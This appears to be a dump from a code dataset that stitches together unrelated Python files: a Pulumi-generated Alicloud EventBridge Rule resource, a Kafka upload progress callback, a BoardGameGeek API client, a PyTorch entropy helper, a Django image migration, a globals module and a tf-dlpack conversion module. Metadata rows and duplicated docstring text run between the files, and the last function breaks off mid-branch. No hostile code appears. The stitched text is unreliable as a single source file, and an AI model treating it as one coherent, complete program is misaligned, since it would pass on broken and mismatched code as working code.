        :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
        """
        # Merging the id into opts makes the engine read (not create) the
        # resource; any explicit state values below seed the lookup.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _RuleState.__new__(_RuleState)
        __props__.__dict__["description"] = description
        __props__.__dict__["event_bus_name"] = event_bus_name
        __props__.__dict__["filter_pattern"] = filter_pattern
        __props__.__dict__["rule_name"] = rule_name
        __props__.__dict__["status"] = status
        __props__.__dict__["targets"] = targets
        return Rule(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The description of rule.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="eventBusName")
    def event_bus_name(self) -> pulumi.Output[str]:
        """
        The name of event bus.
        """
        return pulumi.get(self, "event_bus_name")

    @property
    @pulumi.getter(name="filterPattern")
    def filter_pattern(self) -> pulumi.Output[str]:
        """
        The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
        """
        return pulumi.get(self, "filter_pattern")

    @property
    @pulumi.getter(name="ruleName")
    def rule_name(self) -> pulumi.Output[str]:
        """
        The name of rule.
        """
        return pulumi.get(self, "rule_name")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def targets(self) -> pulumi.Output[Sequence['outputs.RuleTarget']]:
        """
        The target of rule.
        """
        return pulumi.get(self, "targets")
| en | 0.551394 | # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** The set of arguments for constructing a Rule resource. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The name of event bus. The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. The target of rule. The description of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. Input properties used for looking up and filtering Rule resources. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule. The description of rule. The name of event bus. 
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The target of rule. Provides a Event Bridge Rule resource. For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html). > **NOTE:** Available in v1.129.0+. ## Example Usage Basic Usage ```python import pulumi import pulumi_alicloud as alicloud example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value") example_rule = alicloud.eventbridge.Rule("exampleRule", event_bus_name=example_event_bus.id, rule_name=var["name"], description="test", filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}", targets=[alicloud.eventbridge.RuleTargetArgs( target_id="tf-test", endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test", type="acs.mns.queue", param_lists=[ alicloud.eventbridge.RuleTargetParamListArgs( resource_key="queue", form="CONSTANT", value="tf-testaccEbRule", ), alicloud.eventbridge.RuleTargetParamListArgs( resource_key="Body", form="ORIGINAL", ), ], )]) ``` ## Import Event Bridge Rule can be imported using the id, e.g. ```sh $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name> ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). 
:param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule. Provides a Event Bridge Rule resource. For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html). > **NOTE:** Available in v1.129.0+. ## Example Usage Basic Usage ```python import pulumi import pulumi_alicloud as alicloud example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value") example_rule = alicloud.eventbridge.Rule("exampleRule", event_bus_name=example_event_bus.id, rule_name=var["name"], description="test", filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}", targets=[alicloud.eventbridge.RuleTargetArgs( target_id="tf-test", endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test", type="acs.mns.queue", param_lists=[ alicloud.eventbridge.RuleTargetParamListArgs( resource_key="queue", form="CONSTANT", value="tf-testaccEbRule", ), alicloud.eventbridge.RuleTargetParamListArgs( resource_key="Body", form="ORIGINAL", ), ], )]) ``` ## Import Event Bridge Rule can be imported using the id, e.g. ```sh $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name> ``` :param str resource_name: The name of the resource. :param RuleArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. Get an existing Rule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. 
:param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule. The description of rule. The name of event bus. The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The target of rule. | 1.989375 | 2 |
kafka_topic_dumper/progress_percentage.py | Cobliteam/kafka-topic-dumper | 6 | 6617436 | <reponame>Cobliteam/kafka-topic-dumper
import logging
import os
import threading
# Module-level logger for progress messages.
# NOTE(review): calling setLevel() at import time in a library module
# overrides the host application's logging configuration — confirm this is
# intended before reusing the module elsewhere.
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class ProgressPercentage(object):
    """Transfer-progress callback that logs bytes seen / total and a percentage.

    An instance tracks exactly one file and is meant to be handed to a
    transfer library as its progress callback.
    """

    def __init__(self, filename, filesize=None):
        """
        :param filename: path of the file being transferred; shown in log
            lines and, when ``filesize`` is omitted, read from disk to obtain
            the total size.
        :param filesize: optional explicit size in bytes — pass it when the
            file does not exist locally (e.g. a download in progress).
        """
        self._filename = filename
        if filesize is not None:
            self._size = filesize
        else:
            self._size = float(os.path.getsize(filename))
        self._seen_so_far = 0
        # Serialises updates when the transfer library invokes the callback
        # from multiple worker threads.
        self._lock = threading.Lock()

    def __call__(self, bytes_amount):
        # To simplify we'll assume this is hooked up
        # to a single filename.
        with self._lock:
            self._seen_so_far += bytes_amount
            if self._size:
                percentage = (self._seen_so_far / self._size) * 100
            else:
                # Zero-byte files previously raised ZeroDivisionError here;
                # report them as complete instead.
                percentage = 100.0
            # getLogger(__name__) returns the same module-level logger that is
            # configured at import time.
            logging.getLogger(__name__).info(
                "{:40s} {:10} / {:10} ({:03g}%)".format(
                    self._filename, self._seen_so_far, self._size, percentage))
| import logging
import os
import threading
# Module-level logger for progress messages.
# NOTE(review): setLevel() at import time in a library module overrides the
# host application's logging configuration — confirm this is intended.
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class ProgressPercentage(object):
    """Transfer-progress callback: logs bytes seen / total and a percentage."""

    def __init__(self, filename, filesize=None):
        # filename: path of the file being transferred (used in log lines);
        # filesize: explicit size in bytes — falls back to os.path.getsize
        # when omitted, so pass it for files that don't exist locally yet.
        self._filename = filename
        if filesize is not None:
            self._size = filesize
        else:
            self._size = float(os.path.getsize(filename))
        self._seen_so_far = 0
        # Serialises updates when the transfer library calls back from
        # multiple worker threads.
        self._lock = threading.Lock()

    def __call__(self, bytes_amount):
        # To simplify we'll assume this is hooked up
        # to a single filename.
        with self._lock:
            self._seen_so_far += bytes_amount
            # NOTE(review): raises ZeroDivisionError for zero-byte files —
            # consider guarding self._size == 0.
            percentage = (self._seen_so_far / self._size) * 100
            msg = "{:40s} {:10} / {:10} ({:03g}%)"
            logger.info(msg.format(
                self._filename, self._seen_so_far, self._size,
percentage)) | en | 0.956525 | # To simplify we'll assume this is hooked up # to a single filename. | 2.953835 | 3 |
app/site_manager/__init__.py | KaiserMovet/K-homeServer | 2 | 6617437 | <reponame>KaiserMovet/K-homeServer<gh_stars>1-10
from .main_site import MainSite
| from .main_site import MainSite | none | 1 | 1.016096 | 1 | |
pybgg_json/pybgg_json.py | SnarkAttack/pybgg-json | 1 | 6617438 | <gh_stars>1-10
import json
import datetime
import collections
import xml.etree.ElementTree as ElementTree
import pybgg_json.pybgg_utils as pybgg_utils
from pybgg_json.pybgg_cache import PyBggCache
# Wide-open date bounds ("0001-01-01" / "9999-12-31") used as defaults for the
# API's date-range filters so that, unfiltered, all results are included.
MIN_DATE = datetime.date.min.strftime("%Y-%m-%d")
MAX_DATE = datetime.date.max.strftime("%Y-%m-%d")
class PyBggInterface(object):
    """JSON-returning wrapper around the BoardGameGeek XML API2 endpoints.

    Each ``*_request`` method builds the query string for one endpoint,
    fetches the XML via ``pybgg_utils`` and returns the parsed tree
    serialised as a JSON string.
    """

    def __init__(self, cache=None):
        # A ``cache=PyBggCache()`` default in the signature would be created
        # once at class-definition time and shared by every instance (mutable
        # default argument); build a fresh cache per instance instead.
        self.cache = cache if cache is not None else PyBggCache()

    def thing_item_request(self, id, thing_type='', versions=0, videos=0, stats=0, historical=0,
                           marketplace=0, comments=0, ratingcomments=0, page=1, page_size=100,
                           date_from=MIN_DATE, date_to=MAX_DATE):
        """Fetch one or more "thing" items (games, expansions, ...) by id."""
        # Date from and date to are not currently supported by BoardGameGeek
        thing_items_url = (
            f"thing?id={id}&thing_type={thing_type}&versions={versions}&videos={videos}&"
            f"stats={stats}&historical={historical}&marketplace={marketplace}&comments={comments}&"
            f"ratingcomments={ratingcomments}&page={page}&page_size={page_size}"
        )
        root = pybgg_utils._make_request(thing_items_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def family_item_request(self, id, family_type=''):
        """Fetch a family item (e.g. a game family) by id."""
        family_items_url = (
            f"family?id={id}&type={family_type}"
        )
        root = pybgg_utils._make_request(family_items_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def forum_list_request(self, id, type='thing'):
        """List the forums attached to a thing or family."""
        forum_list_url = (
            f"forumlist?id={id}&type={type}"
        )
        root = pybgg_utils._make_request(forum_list_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def forum_request(self, id, page=1):
        """Fetch one page of threads in a forum."""
        forum_url = (
            f"forum?id={id}&page={page}"
        )
        root = pybgg_utils._make_request(forum_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def thread_request(self, id, min_article_id=0, min_article_date='', count=-1, username=''):
        """Fetch a forum thread; ``count`` of -1 means "no article limit"."""
        thread_url = (
            f"thread?id={id}&minarticleid={min_article_id}&minarticledate={min_article_date}"
        )
        if count != -1:
            thread_url += f"&count={count}"
        root = pybgg_utils._make_request(thread_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def user_request(self, name, buddies=0, guilds=0, hot=0, top=0, domain='boardgame', page=1):
        """Fetch a user's profile, optionally with buddies/guilds/lists."""
        user_url = (
            f"user?name={name}&buddies={buddies}&guilds={guilds}&hot={hot}&top={top}&"
            f"domain={domain}&page={page}"
        )
        root = pybgg_utils._make_request(user_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def guild_request(self, id, members=0, sorttype='username', page=1):
        """Fetch a guild, optionally including its member roster."""
        guild_url = (
            f"guild?id={id}&members={members}&sort={sorttype}&page={page}"
        )
        root = pybgg_utils._make_request(guild_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    # Must use either username or id AND type
    def plays_request(self, username=None, id=None, type=None, mindate=MIN_DATE,
                      maxdate=MAX_DATE, subtype='boardgame', page=1):
        """Fetch logged plays for a user or for an item (id + type)."""
        if username is None and (id is None or type is None):
            return {}
        else:
            if username is not None:
                identifier = f"username={username}"
            else:
                identifier = f"id={id}&type={type}"
            plays_url = (
                f"plays?{identifier}&mindate={mindate}&maxdate={maxdate}&subtype={subtype}&"
                f"page={page}"
            )
            root = pybgg_utils._make_request(plays_url)
            return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def collection_request(self, username, subtype='boardgame', exclude_subtype=None, id=None,
                           brief=None, stats=None, own=None, rated=None, playerd=None, comment=None,
                           trade=None, want=None, wishlist=None, wishlist_priority=None, preordered=None,
                           wanttoplay=None, wanttobuy=None, prevowned=None, hasparts=None, wantparts=None,
                           minrating=None, rating=None, minbggrating=None, bggrating=None, minplays=None,
                           maxplays=None, showprivate=None, collid=None, modifiedsince=MIN_DATE):
        """Fetch a user's collection; only filters explicitly given (not None)
        are added to the query string.
        """
        # Enumerate the optional filters explicitly. The previous version
        # iterated ``locals()``, which also picked up ``self``, ``username``,
        # ``subtype``, ``modifiedsince`` and the partially built URL string
        # itself, injecting duplicated and garbage query parameters; it also
        # omitted the '&' separator after the subtype parameter.
        optional_filters = {
            'exclude_subtype': exclude_subtype, 'id': id, 'brief': brief, 'stats': stats,
            'own': own, 'rated': rated, 'playerd': playerd, 'comment': comment,
            'trade': trade, 'want': want, 'wishlist': wishlist,
            'wishlist_priority': wishlist_priority, 'preordered': preordered,
            'wanttoplay': wanttoplay, 'wanttobuy': wanttobuy, 'prevowned': prevowned,
            'hasparts': hasparts, 'wantparts': wantparts, 'minrating': minrating,
            'rating': rating, 'minbggrating': minbggrating, 'bggrating': bggrating,
            'minplays': minplays, 'maxplays': maxplays, 'showprivate': showprivate,
            'collid': collid,
        }
        collection_url = f"collection?username={username}&subtype={subtype}&"
        for arg, arg_val in optional_filters.items():
            if arg_val is not None:
                collection_url += f"{arg}={arg_val}&"
        collection_url += f"modifiedsince={modifiedsince}"
        root = pybgg_utils._make_request(collection_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root)) | import json
import datetime
import collections
import xml.etree.ElementTree as ElementTree
import pybgg_json.pybgg_utils as pybgg_utils
from pybgg_json.pybgg_cache import PyBggCache
# Wide-open date bounds ("0001-01-01" / "9999-12-31") used as defaults for the
# API's date-range filters so that, unfiltered, all results are included.
MIN_DATE = datetime.date.min.strftime("%Y-%m-%d")
MAX_DATE = datetime.date.max.strftime("%Y-%m-%d")
class PyBggInterface(object):
    """JSON-returning wrapper around the BoardGameGeek XML API2 endpoints.

    Each ``*_request`` method builds the query string for one endpoint,
    fetches the XML via ``pybgg_utils`` and returns the parsed tree
    serialised as a JSON string.
    """

    def __init__(self, cache=None):
        # A ``cache=PyBggCache()`` default in the signature would be created
        # once at class-definition time and shared by every instance (mutable
        # default argument); build a fresh cache per instance instead.
        self.cache = cache if cache is not None else PyBggCache()

    def thing_item_request(self, id, thing_type='', versions=0, videos=0, stats=0, historical=0,
                           marketplace=0, comments=0, ratingcomments=0, page=1, page_size=100,
                           date_from=MIN_DATE, date_to=MAX_DATE):
        """Fetch one or more "thing" items (games, expansions, ...) by id."""
        # Date from and date to are not currently supported by BoardGameGeek
        thing_items_url = (
            f"thing?id={id}&thing_type={thing_type}&versions={versions}&videos={videos}&"
            f"stats={stats}&historical={historical}&marketplace={marketplace}&comments={comments}&"
            f"ratingcomments={ratingcomments}&page={page}&page_size={page_size}"
        )
        root = pybgg_utils._make_request(thing_items_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def family_item_request(self, id, family_type=''):
        """Fetch a family item (e.g. a game family) by id."""
        family_items_url = (
            f"family?id={id}&type={family_type}"
        )
        root = pybgg_utils._make_request(family_items_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def forum_list_request(self, id, type='thing'):
        """List the forums attached to a thing or family."""
        forum_list_url = (
            f"forumlist?id={id}&type={type}"
        )
        root = pybgg_utils._make_request(forum_list_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def forum_request(self, id, page=1):
        """Fetch one page of threads in a forum."""
        forum_url = (
            f"forum?id={id}&page={page}"
        )
        root = pybgg_utils._make_request(forum_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def thread_request(self, id, min_article_id=0, min_article_date='', count=-1, username=''):
        """Fetch a forum thread; ``count`` of -1 means "no article limit"."""
        thread_url = (
            f"thread?id={id}&minarticleid={min_article_id}&minarticledate={min_article_date}"
        )
        if count != -1:
            thread_url += f"&count={count}"
        root = pybgg_utils._make_request(thread_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def user_request(self, name, buddies=0, guilds=0, hot=0, top=0, domain='boardgame', page=1):
        """Fetch a user's profile, optionally with buddies/guilds/lists."""
        user_url = (
            f"user?name={name}&buddies={buddies}&guilds={guilds}&hot={hot}&top={top}&"
            f"domain={domain}&page={page}"
        )
        root = pybgg_utils._make_request(user_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def guild_request(self, id, members=0, sorttype='username', page=1):
        """Fetch a guild, optionally including its member roster."""
        guild_url = (
            f"guild?id={id}&members={members}&sort={sorttype}&page={page}"
        )
        root = pybgg_utils._make_request(guild_url)
        return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    # Must use either username or id AND type
    def plays_request(self, username=None, id=None, type=None, mindate=MIN_DATE,
                      maxdate=MAX_DATE, subtype='boardgame', page=1):
        """Fetch logged plays for a user or for an item (id + type)."""
        if username is None and (id is None or type is None):
            return {}
        else:
            if username is not None:
                identifier = f"username={username}"
            else:
                identifier = f"id={id}&type={type}"
            plays_url = (
                f"plays?{identifier}&mindate={mindate}&maxdate={maxdate}&subtype={subtype}&"
                f"page={page}"
            )
            root = pybgg_utils._make_request(plays_url)
            return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))

    def collection_request(self, username, subtype='boardgame', exclude_subtype=None, id=None,
                           brief=None, stats=None, own=None, rated=None, playerd=None, comment=None,
                           trade=None, want=None, wishlist=None, wishlist_priority=None, preordered=None,
                           wanttoplay=None, wanttobuy=None, prevowned=None, hasparts=None, wantparts=None,
                           minrating=None, rating=None, minbggrating=None, bggrating=None, minplays=None,
                           maxplays=None, showprivate=None, collid=None, modifiedsince=MIN_DATE):
        """Fetch a user's collection; only filters explicitly given (not None)
        are added to the query string.
        """
        # Enumerate the optional filters explicitly. The previous version
        # iterated ``locals()``, which also picked up ``self``, ``username``,
        # ``subtype``, ``modifiedsince`` and the partially built URL string
        # itself, injecting duplicated and garbage query parameters; it also
        # omitted the '&' separator after the subtype parameter.
        optional_filters = {
            'exclude_subtype': exclude_subtype, 'id': id, 'brief': brief, 'stats': stats,
            'own': own, 'rated': rated, 'playerd': playerd, 'comment': comment,
            'trade': trade, 'want': want, 'wishlist': wishlist,
            'wishlist_priority': wishlist_priority, 'preordered': preordered,
            'wanttoplay': wanttoplay, 'wanttobuy': wanttobuy, 'prevowned': prevowned,
            'hasparts': hasparts, 'wantparts': wantparts, 'minrating': minrating,
            'rating': rating, 'minbggrating': minbggrating, 'bggrating': bggrating,
            'minplays': minplays, 'maxplays': maxplays, 'showprivate': showprivate,
            'collid': collid,
        }
        collection_url = f"collection?username={username}&subtype={subtype}&"
        for arg, arg_val in optional_filters.items():
            if arg_val is not None:
                collection_url += f"{arg}={arg_val}&"
        collection_url += f"modifiedsince={modifiedsince}"
        root = pybgg_utils._make_request(collection_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root)) | en | 0.938812 | # Date from and date to are not currently supported by BoardGameGeek # Must use either username or id AND type | 2.477622 | 2 |
starcraft_agents/distributions.py | ShawnSpooner/starcraft_agents | 3 | 6617439 | import torch
import torch.nn as nn
class Multinoulli(object):
    """Categorical ("multinoulli") distribution helpers over raw logits."""

    def __init__(self):
        super(Multinoulli, self).__init__()
        # CrossEntropyLoss combines log-softmax and NLL, so it consumes raw
        # logits directly; its default reduction averages over the batch.
        self.neglogp = nn.CrossEntropyLoss()

    def entropy(self, logits):
        """Return the entropy of softmax(logits) along the last dimension.

        The maximum is subtracted per row (softmax is shift-invariant) for
        numerical stability. The previous global ``torch.max(logits)`` made
        rows far below the batch-wide maximum underflow to 0/0 = NaN.
        """
        a0 = logits - torch.max(logits, dim=-1, keepdim=True)[0]
        ea0 = torch.exp(a0)
        z0 = ea0.sum(-1, keepdim=True)
        p0 = ea0 / z0
        return (p0 * (torch.log(z0) - a0)).sum(-1)

    def negative_log_probability(self, logits, actions):
        """Mean cross-entropy of ``actions`` under softmax(logits)."""
        return self.neglogp(logits, actions)
| import torch
import torch.nn as nn
class Multinoulli(object):
    """Categorical ("multinoulli") distribution helpers over raw logits."""

    def __init__(self):
        super(Multinoulli, self).__init__()
        # CrossEntropyLoss combines log-softmax and NLL, so it consumes raw
        # logits directly; its default reduction averages over the batch.
        self.neglogp = nn.CrossEntropyLoss()

    def entropy(self, logits):
        """Return the entropy of softmax(logits) along the last dimension.

        The maximum is subtracted per row (softmax is shift-invariant) for
        numerical stability. The previous global ``torch.max(logits)`` made
        rows far below the batch-wide maximum underflow to 0/0 = NaN.
        """
        a0 = logits - torch.max(logits, dim=-1, keepdim=True)[0]
        ea0 = torch.exp(a0)
        z0 = ea0.sum(-1, keepdim=True)
        p0 = ea0 / z0
        return (p0 * (torch.log(z0) - a0)).sum(-1)

    def negative_log_probability(self, logits, actions):
        """Mean cross-entropy of ``actions`` under softmax(logits)."""
        return self.neglogp(logits, actions)
| none | 1 | 2.786385 | 3 | |
betty/cropper/migrations/0001_initial.py | theonion/betty-cropper | 14 | 6617440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.files.storage
import betty.cropper.models
import jsonfield.fields
# Auto-generated by Django's makemigrations: initial schema creating the
# ``Image`` model for betty-cropper.  Do not hand-edit field definitions;
# generate a follow-up migration instead.
class Migration(migrations.Migration):
    # First migration of the app, so there is nothing to depend on.
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255)),
                ('credit', models.CharField(max_length=120, null=True, blank=True)),
                # NOTE(review): the FileSystemStorage ``location`` below is an
                # absolute path captured from the machine that generated this
                # migration (a throwaway virtualenv temp directory).  Storage
                # kwargs do not affect the database schema, but consider
                # regenerating the migration to avoid confusion.
                ('source', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.source_upload_to, blank=True)),
                ('optimized', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.optimized_upload_to, blank=True)),
                ('height', models.IntegerField(null=True, blank=True)),
                ('width', models.IntegerField(null=True, blank=True)),
                # Presumably stores per-ratio crop selections as JSON -- TODO
                # confirm against betty.cropper.models.
                ('selections', jsonfield.fields.JSONField(null=True, blank=True)),
                ('jpeg_quality', models.IntegerField(null=True, blank=True)),
                ('animated', models.BooleanField(default=False)),
            ],
            options={
                'permissions': (('read', 'Can search images, and see the detail data'), ('crop', 'Can crop images')),
            },
            bases=(models.Model,),
        ),
    ]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.files.storage
import betty.cropper.models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('credit', models.CharField(max_length=120, null=True, blank=True)),
('source', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.source_upload_to, blank=True)),
('optimized', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.optimized_upload_to, blank=True)),
('height', models.IntegerField(null=True, blank=True)),
('width', models.IntegerField(null=True, blank=True)),
('selections', jsonfield.fields.JSONField(null=True, blank=True)),
('jpeg_quality', models.IntegerField(null=True, blank=True)),
('animated', models.BooleanField(default=False)),
],
options={
'permissions': (('read', 'Can search images, and see the detail data'), ('crop', 'Can crop images')),
},
bases=(models.Model,),
),
]
| en | 0.769321 | # -*- coding: utf-8 -*- | 1.810046 | 2 |
globals.py | DariHernandez/SNIIM-Extractor | 0 | 6617441 | <filename>globals.py
# Module-level shared state, imported by other modules for progress
# reporting.  NOTE: the original declared ``global status`` / ``global
# loading`` here; at module scope the ``global`` statement is a no-op, so
# those declarations were removed with no change in behavior.
status = "Loading..."  # current progress message (presumably shown in a UI -- confirm with callers)
loading = False  # busy flag; presumably toggled by whatever drives the extraction run
| <filename>globals.py
global status
global loading
status = "Loading..."
loading = False
| none | 1 | 1.275184 | 1 | |
python/tfdlpack/core.py | VoVAllen/tf-dlpack | 39 | 6617442 | <filename>python/tfdlpack/core.py<gh_stars>10-100
# pylint: disable=no-name-in-module, invalid-name, no-member
"""core functions"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from . import libinfo
from .capsule_api import to_capsule, get_capsule_address
# version number
__version__ = libinfo.__version__
# find lib
libname = libinfo.get_libname(tf.__version__)
dlpack_ops = load_library.load_op_library(libinfo.find_lib_path(libname)[0])
_to_dlpack_address = dlpack_ops.to_dlpack
_from_dlpack = dlpack_ops.from_dlpack
_get_device_and_dtype = dlpack_ops.get_device_and_dtype
_destruct_dlpack = dlpack_ops.destruct_dlpack
def _destruct_capsule(dlm_address):
    """Run the destructor op for the DLManagedTensor at ``dlm_address``.

    ``dlm_address`` is the raw pointer previously extracted from a DLPack
    capsule; the destruct op is pinned to CPU because the address itself is
    host-side data.
    """
    with tf.device("cpu"):
        _destruct_dlpack(dlm_address)
def to_dlpack(tf_tensor):
    """Convert the given tensorflow tensor to DLPack format.

    Returns a PyCapsule wrapping a DLManagedTensor.  The conversion op is
    executed on the tensor's own device; presumably the capsule shares
    memory with ``tf_tensor`` rather than copying -- confirm against the
    ``to_dlpack`` kernel implementation.
    """
    with tf.device(tf_tensor.device):
        cap = to_capsule(_to_dlpack_address(tf_tensor))
    return cap
def get_device_and_dtype(dl_capsule):
    """Inspect a DLPack capsule without consuming it.

    Args:
        dl_capsule: PyCapsule wrapping a DLManagedTensor.

    Returns:
        A numpy array of three ints ``[device_type, device_id, dtype]``:
        the first two follow the DLPack device enumeration and the third is
        a TensorFlow dtype enum value (convertible via ``tf.DType(dtype)``).
    """
    # No ``consume`` flag here (from_dlpack passes consume=True explicitly),
    # so ownership presumably stays with the capsule -- confirm in
    # capsule_api.get_capsule_address.
    ptr = get_capsule_address(dl_capsule)
    # Pass the raw pointer to the custom op as a uint64 scalar, built on CPU.
    with tf.device('/cpu:0'):
        ad_tensor = tf.constant([ptr], dtype=tf.uint64)
    return _get_device_and_dtype(ad_tensor).numpy()
def from_dlpack(dl_capsule):
    """Convert a DLPack capsule to a tf tensor (consumes the capsule)."""
    device_and_dtype = get_device_and_dtype(dl_capsule)
    device = device_and_dtype[:2]  # [device_type, device_id]
    dtype = device_and_dtype[2]  # TF dtype enum value
    # consume=True: ownership of the DLManagedTensor transfers to the TF op.
    ptr = get_capsule_address(dl_capsule, consume=True)
    if device[0] == 1:  # DLPack kDLCPU
        tf_device_type = "cpu"
        tf_device_id = int(device[1])
    elif device[0] == 2:  # DLPack kDLGPU (CUDA)
        tf_device_type = "gpu"
        tf_device_id = int(device[1])
    else:
